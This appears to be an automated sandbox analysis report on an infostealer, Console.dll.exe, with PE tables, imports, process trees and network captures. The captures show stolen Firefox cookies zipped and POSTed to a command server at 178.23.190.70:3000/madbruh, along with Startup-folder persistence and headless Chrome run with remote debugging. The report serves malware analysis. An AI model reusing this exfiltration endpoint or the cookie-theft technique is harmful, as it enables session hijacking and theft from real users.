                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        push 008ECDF0h
                                                                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                                                                        mov eax, dword ptr [esp+10h]
                                                                                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                        lea ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                        sub esp, eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        mov eax, dword ptr [00A77040h]
                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                                        push dword ptr [ebp-08h]
                                                                                                                                                                                                                        mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        and dword ptr [00A7E470h], 00000000h
                                                                                                                                                                                                                        sub esp, 24h
                                                                                                                                                                                                                        or dword ptr [00A77090h], 00000000h
                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x674520 | 0xc4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6745e4 | 0x168 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69d000 | 0x1576c8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f5000 | 0x3ff20 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x60ffc0 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x610040 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x543760 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x53e000 | 0x71c | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x674318 | 0x60 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x53b9ca | 0x53ba00 | 27028f6c227e03e80edd3fa24fa8760b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .CLR_UEF | 0x53d000 | 0x44 | 0x200 | f2b641ed546bf3bc31d08dec881d9e8c | False | 0.134765625 | data | 0.9578521415731932 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x53e000 | 0x138c6e | 0x138e00 | c8df93ee833a4a778ad2ddff72671a8f | False | 0.37248582950459447 | data | 5.154013666287243 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x677000 | 0x13bc4 | 0x7200 | adfede934d7861c18f399ebbc75df063 | False | 0.2565446820175439 | Matlab v4 mat-file (little endian) \377\377\377\377, numeric, rows 0, columns 0 | 3.8031276484007046 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .didat | 0x68b000 | 0x1c | 0x200 | 34950fe11f3a721d87970a33d0128597 | False | 0.0546875 | data | 0.25996289920834015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| _RDATA | 0x68c000 | 0x10f10 | 0x11000 | 211089d7d672e1712b48c26d0bdc0a1b | False | 0.16291360294117646 | data | 5.364619170209927 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x69d000 | 0x1576c8 | 0x157800 | 23d927bbfc4be587a93d613bdebcfddb | False | 0.40919034866266374 | data | 6.384281088343183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x7f5000 | 0x3ff20 | 0x40000 | 863392d201ba4cd20ac6b106854bdf4f | False | 0.5942230224609375 | data | 6.669163867222735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x69d29c | 0x9788 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9990461950917715 |
| RT_ICON | 0x6a6a24 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | | | 0.1875517567727434 |
| RT_ICON | 0x6b724c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | | | 0.26363958431743034 |
| RT_ICON | 0x6bb474 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.3233402489626556 |
| RT_ICON | 0x6bda1c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.40689493433395874 |
| RT_ICON | 0x6beac4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.650709219858156 |
| RT_RCDATA | 0x6bef2c | 0x24 | data | | | 1.1666666666666667 |
| RT_RCDATA | 0x6bef50 | 0x24 | data | | | 1.1666666666666667 |
| RT_RCDATA | 0x6bef74 | 0x1351a0 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | | | 0.41257476806640625 |
| RT_GROUP_ICON | 0x7f4114 | 0x5a | data | | | 0.7666666666666667 |
| RT_VERSION | 0x7f4170 | 0x2ac | data | | | 0.4327485380116959 |
| RT_MANIFEST | 0x7f441c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| KERNEL32.dll | RaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, InitializeContext, CopyContext, SetXStateFeaturesMask, WerRegisterRuntimeExceptionModule, GetSystemDefaultLCID, GetUserDefaultLCID, OutputDebugStringA, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, QueryThreadCycleTime, SetThreadGroupAffinity, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetModuleFileNameW, CreateProcessW, GetCPInfo, GetTempPathW, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, CreateFileMappingW, MapViewOfFile, GetActiveProcessorGroupCount, GetCurrentProcessorNumberEx, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, FindClose, LoadLibraryA, GetCurrentDirectoryW, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, ReadProcessMemory, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, WideCharToMultiByte, DeleteCriticalSection, InitializeCriticalSection, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetWriteWatch, GetLargePageMinimum, ResetWriteWatch, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, TlsFree, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, GetSystemTimeAsFileTime |
| ADVAPI32.dll | RegQueryValueExW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, ReportEventW, RegisterEventSourceW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW |
                                                                                                                                                                                                                        ole32.dllCoCreateFreeThreadedMarshaler, CreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoGetClassObject
                                                                                                                                                                                                                        OLEAUT32.dllSafeArrayPutElement, LoadRegTypeLib, CreateErrorInfo, SafeArraySetRecordInfo, GetRecordInfoFromTypeInfo, SafeArrayGetElemsize, SysStringByteLen, SafeArrayAllocDescriptorEx, SysAllocStringByteLen, VarCyFromDec, SafeArrayCreateVector, SysFreeString, VariantInit, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, VariantClear, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayAllocData, SafeArrayDestroy, QueryPathOfRegTypeLib, VariantChangeTypeEx, LoadTypeLibEx, VariantChangeType, SafeArrayGetVartype
                                                                                                                                                                                                                        USER32.dllLoadStringW, MessageBoxW
                                                                                                                                                                                                                        SHELL32.dllShellExecuteW
                                                                                                                                                                                                                        api-ms-win-crt-string-l1-1-0.dllstrncat_s, wcsncat_s, _stricmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strnlen, wcstok_s, isdigit, isalpha, towlower, iswupper, strncpy, isspace, strtok_s, strcmp, _strnicmp, isupper, iswspace, toupper, _wcsdup, tolower, wcsncmp, islower, strncmp, strcspn, strncpy_s, __strncnt, _wcsnicmp, strlen, wcscpy_s, wcsncpy_s, _wcsicmp, strcpy_s, strcat_s
                                                                                                                                                                                                                        api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vfwprintf, fflush, fputws, fputwc, __acrt_iob_func, __stdio_common_vswprintf, _set_fmode, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, __stdio_common_vsscanf, fgetc, fputc, _wfsopen, fclose, fgets, _wfopen, __p__commode, setvbuf, _setmode, _dup, _fileno, ftell, fseek, __stdio_common_vsnprintf_s, __stdio_common_vfprintf, fputs, __stdio_common_vsnwprintf_s, fwrite, _flushall, fopen, __stdio_common_vsprintf_s
                                                                                                                                                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn, abort, exit, _beginthreadex, terminate, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _wcserror_s, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _errno, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _invalid_parameter_noinfo, _controlfp_s
                                                                                                                                                                                                                        api-ms-win-crt-convert-l1-1-0.dll_wcstoui64, _itow_s, _ltow_s, wcstoul, strtoul, strtoull, _wtoi, atol, atoi
                                                                                                                                                                                                                        api-ms-win-crt-heap-l1-1-0.dllrealloc, free, _set_new_mode, malloc, calloc
                                                                                                                                                                                                                        api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                                                                                                                                                        api-ms-win-crt-math-l1-1-0.dllasinh, asinhf, atanhf, cbrtf, acoshf, log2f, __libm_sse2_asin, __libm_sse2_atan, __libm_sse2_atan2, __libm_sse2_log10, __libm_sse2_pow, acosh, atanh, log2, __libm_sse2_sin, __libm_sse2_tan, _libm_sse2_acos_precise, _libm_sse2_asin_precise, _libm_sse2_atan_precise, _fdopen, _libm_sse2_cos_precise, _libm_sse2_exp_precise, trunc, truncf, ilogb, ilogbf, _finite, _libm_sse2_log10_precise, _libm_sse2_log_precise, _libm_sse2_pow_precise, _libm_sse2_sin_precise, __libm_sse2_acos, frexp, _CItanh, _CIsinh, _libm_sse2_sqrt_precise, _libm_sse2_tan_precise, ceil, _CIfmod, floor, fma, fmaf, __libm_sse2_cos, _CIcosh, cbrt, _CIatan2, __libm_sse2_exp, _ldclass, _dclass, modf, _isnan, __setusermatherr, __libm_sse2_log, _copysign
                                                                                                                                                                                                                        api-ms-win-crt-time-l1-1-0.dll_gmtime64_s, _time64, wcsftime
                                                                                                                                                                                                                        api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                                                                                                                                        api-ms-win-crt-locale-l1-1-0.dll___mb_cur_max_func, ___lc_codepage_func, ___lc_locale_name_func, __pctype_func, setlocale, localeconv, _configthreadlocale, _unlock_locales, _lock_locales
                                                                                                                                                                                                                        api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _wremove, _wrename, _lock_file

| Name | Ordinal | Address |
| --- | --- | --- |
| CLRJitAttachState | 3 | 0xa83dfc |
| DotNetRuntimeInfo | 4 | 0xa78650 |
| MetaDataGetDispenser | 5 | 0x89b4c0 |
| g_CLREngineMetrics | 2 | 0xa780cc |
| g_dacTable | 6 | 0x956270 |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Dec 17, 2024 12:03:29.788103104 CET | 49723 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:03:29.908014059 CET | 3000 | 49723 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:03:29.908231974 CET | 49723 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:03:29.913108110 CET | 49723 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:03:30.033010006 CET | 3000 | 49723 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:03:51.866507053 CET | 3000 | 49723 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:03:51.866638899 CET | 49723 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:03:51.869051933 CET | 49723 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:03:51.988785028 CET | 3000 | 49723 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:04:08.362018108 CET | 49816 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:04:08.482363939 CET | 3000 | 49816 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:04:08.482695103 CET | 49816 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:04:08.488152981 CET | 49816 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:04:08.608242035 CET | 3000 | 49816 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:04:30.383389950 CET | 3000 | 49816 | 178.23.190.70 | 192.168.2.7 |
| Dec 17, 2024 12:04:30.383495092 CET | 49816 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:04:30.392596006 CET | 49816 | 3000 | 192.168.2.7 | 178.23.190.70 |
| Dec 17, 2024 12:04:30.512363911 CET | 3000 | 49816 | 178.23.190.70 | 192.168.2.7 |

                                                                                                                                                                                                                        • 178.23.190.70:3000

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.7 | 49723 | 178.23.190.70 | 3000 | 3736 | C:\Users\user\Desktop\Console.dll.exe |

Timestamp:Dec 17, 2024 12:03:29.913108110 CET
Bytes transferred:1099
Direction:OUT
Data:
POST /madbruh HTTP/1.1
                                                                                                                                                                                                                        Host: 178.23.190.70:3000
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary="cf72a99c-b923-4f30-8451-720f2653c718"
                                                                                                                                                                                                                        Content-Length: 942
                                                                                                                                                                                                                        Data Ascii: --cf72a99c-b923-4f30-8451-720f2653c718Content-Type: multipart/form-dataContent-Disposition: form-data; name=file; filename="887849 - FIREFOX.zip"; filename*=utf-8''887849%20-%20FIREFOX.zipPK-EW~3'fu7wner3.default-release\cookies.sqliteM@+*A"xQ~X6$?xh.Uf&oLYyTj5(Z;hu;8k5}}yJO$_di2lQFnVB$tzv<{p7~y=f*9B_qn(?d'd8oeu0'0}=7liRV$-(ViRelGf0,VT?6Uq]tVa[SfUz\H^.'qp4h*/f"K<upaY^_|F#fOc+YT|km]YwB[v{~@ogoPK-EW~3'fu7wner3.default-release\cookies.sqlitePKUS--cf72a99c-b923-4f30-8451-720f2653c718--


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.7 | 49816 | 178.23.190.70 | 3000 | 7728 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe |

Timestamp:Dec 17, 2024 12:04:08.488152981 CET
Bytes transferred:1099
Direction:OUT
Data:
POST /madbruh HTTP/1.1
                                                                                                                                                                                                                        Host: 178.23.190.70:3000
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary="2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9"
                                                                                                                                                                                                                        Content-Length: 942
                                                                                                                                                                                                                        Data Ascii: --2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9Content-Type: multipart/form-dataContent-Disposition: form-data; name=file; filename="887849 - FIREFOX.zip"; filename*=utf-8''887849%20-%20FIREFOX.zipPK-EW~3'fu7wner3.default-release\cookies.sqliteM@+*A"xQ~X6$?xh.Uf&oLYyTj5(Z;hu;8k5}}yJO$_di2lQFnVB$tzv<{p7~y=f*9B_qn(?d'd8oeu0'0}=7liRV$-(ViRelGf0,VT?6Uq]tVa[SfUz\H^.'qp4h*/f"K<upaY^_|F#fOc+YT|km]YwB[v{~@ogoPK-EW~3'fu7wner3.default-release\cookies.sqlitePKUS--2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9--


                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:06:03:20
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Console.dll.exe"
                                                                                                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5 hash:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:06:03:25
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:06:03:26
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:07:11:10
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe"
                                                                                                                                                                                                                        Imagebase:0x490000
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5 hash:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:07:11:11
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:07:11:12
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:10.7%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:31.2%
                                                                                                                                                                                                                          Signature Coverage:8.7%
                                                                                                                                                                                                                          Total number of Nodes:1069
                                                                                                                                                                                                                          Total number of Limit Nodes:19
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66647->66688 66648->66565 66650 fc65c7 66649->66650 66652 fc65ae 66649->66652 66653 fc667c 66650->66653 66689 fc57f0 66650->66689 66651 fc65c2 66651->66599 66652->66651 66720 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66652->66720 66656 fc66ad 66653->66656 66721 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66653->66721 66656->66651 66722 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66656->66722 66659 fc6705 66723 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66659->66723 66662 fc6623 66662->66653 66666 fc57f0 383 API calls 66662->66666 66698 fc67d0 66662->66698 66719 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66662->66719 66666->66662 66668->66562 66669->66581 66670->66600 66671->66599 66673 fcfe29 66672->66673 66674 fc6366 66672->66674 66675 fcfe3b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66673->66675 66676 1215d00 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66673->66676 66678 12199e0 5 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66674->66678 66675->66674 66677 fcfe5d HeapFree 66675->66677 66676->66675 66677->66674 66678->66609 66679->66611 66680->66601 66681->66573 66682->66578 66683->66601 66684->66578 66685->66576 66686->66576 66687->66647 66688->66647 66690 fc5888 66689->66690 66691 fc5822 66689->66691 66690->66662 66724 108b4c0 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66691->66724 66693 fc582a 66693->66690 66694 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66693->66694 66695 fc584b 66694->66695 66696 fc589e 66695->66696 66725 fca580 LeaveCriticalSection 
